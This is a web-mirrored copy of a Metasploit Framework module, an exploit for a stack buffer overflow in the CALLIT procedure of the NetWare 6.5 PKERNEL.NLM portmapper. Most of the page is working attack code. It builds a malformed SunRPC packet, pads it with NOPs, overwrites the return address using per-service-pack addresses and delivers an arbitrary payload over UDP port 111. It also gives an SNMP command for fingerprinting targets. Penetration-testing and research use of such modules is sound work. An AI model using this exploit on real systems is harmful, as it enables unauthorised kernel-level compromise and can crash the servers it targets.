Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/netware/sunrpc/pkernel_callit.rb
19611 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::Remote::Udp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
16
'Description' => %q{
17
This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
18
PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
19
The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
20
cause the operating system to reboot.
21
},
22
'Author' => [ 'pahtzo', ],
23
'License' => MSF_LICENSE,
24
'References' => [
25
# There is no CVE for this vulnerability
26
[ 'BID', '36564' ],
27
[ 'OSVDB', '58447' ],
28
[ 'ZDI', '09-067' ],
29
],
30
'Privileged' => true,
31
'Payload' => {
32
'Space' => 2020
33
},
34
'Platform' => 'netware',
35
'Targets' => [
36
# NetWare SP and PKERNEL.NLM version can be found in SNMP:
37
# snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
38
# sysDescr.0 = STRING: Novell NetWare 5.70.08 October 3, 2008
39
# hrSWRunName.1191394992 = STRING: "PKERNEL.NLM v15.01 (20081014)"
40
[ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
41
[ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
42
[ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
43
[ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
44
[ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
45
[ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
46
[ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
47
],
48
'Notes' => {
49
'Stability' => [ CRASH_OS_RESTARTS ],
50
'SideEffects' => [ IOC_IN_LOGS ],
51
'Reliability' => [ UNRELIABLE_SESSION ]
52
},
53
'DisclosureDate' => '2009-09-30'
54
)
55
)
56
57
register_options([Opt::RPORT(111)])
58
end
59
60
def exploit
61
connect_udp
62
63
buf = [rand(0xffffffff)].pack('N') # XID
64
buf << [0].pack('N') # Message Type: Call (0)
65
buf << [2].pack('N') # RPC Version: 2
66
buf << [100000].pack('N') # Program: Portmap (100000)
67
buf << [2].pack('N') # Program Version: 2
68
buf << [5].pack('N') # Procedure: CALLIT (5)
69
buf << [0].pack('N') # Credentials AUTH_NULL (0)
70
buf << [0].pack('N') # Length: 0
71
buf << [0].pack('N') # Verifier AUTH_NULL (0)
72
buf << [0].pack('N') # Length: 0
73
buf << [0].pack('N') # Program: Unknown (0)
74
buf << [1].pack('N') # Version: 1
75
buf << [1].pack('N') # Procedure: proc-1 (1)
76
buf << [4097].pack('N') # Arguments: <DATA> length: 4097
77
78
buf << make_nops(2072) # fill to ret
79
buf << [target.ret].pack('V') # addr. of push esp - ret
80
buf << payload.encoded #
81
82
# print_status("payload space #{payload_space()}...")
83
# print_status("payload len #{payload.encoded.length}...")
84
# print_status("total buf len #{buf.length}...")
85
86
print_status("Trying target #{target.name}...")
87
88
udp_sock.put(buf)
89
handler
90
disconnect_udp
91
end
92
end
93
94